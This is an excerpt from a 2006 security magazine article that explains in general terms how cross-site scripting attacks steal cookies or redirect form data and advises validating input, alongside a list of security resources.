This article can also be found in the Premium Editorial Download "Information Security magazine: Special manager's guide: Monitoring identities."
Download it now to read this article plus other related content.
|Resources & Tools|
Open Web Application Security Project (OWASP)
Web Application Security Consortium (WASC)
IIS Lockdown Tool
Google Webmasters FAQ
SANS Top 20 Vulnerabilities
Unlike many application layer attacks, cross-site scripting attacks target an application's users, often with the aim of stealing personal data. They affect all Web applications that make use of scripting and aim to indirectly compromise an application's infrastructure.
Most Web sites have numerous possible injection points, making them vulnerable to this attack method. And although client-side scripts are not able to directly affect server-side information, they can still compromise a site's security by altering form values or switching the form action to post the submitted data to the attacker's site. The most common purpose of XSS attacks, however, is to gather cookie data. Cookies are commonly--and often incorrectly--used to store information intended to be persistent during a browser session, or from session to session, such as session IDs, user preferences and login information. If input to your dynamically generated Web pages is not validated either before being processed or published, you could fall prey to an XSS attack.
This was first published in August 2006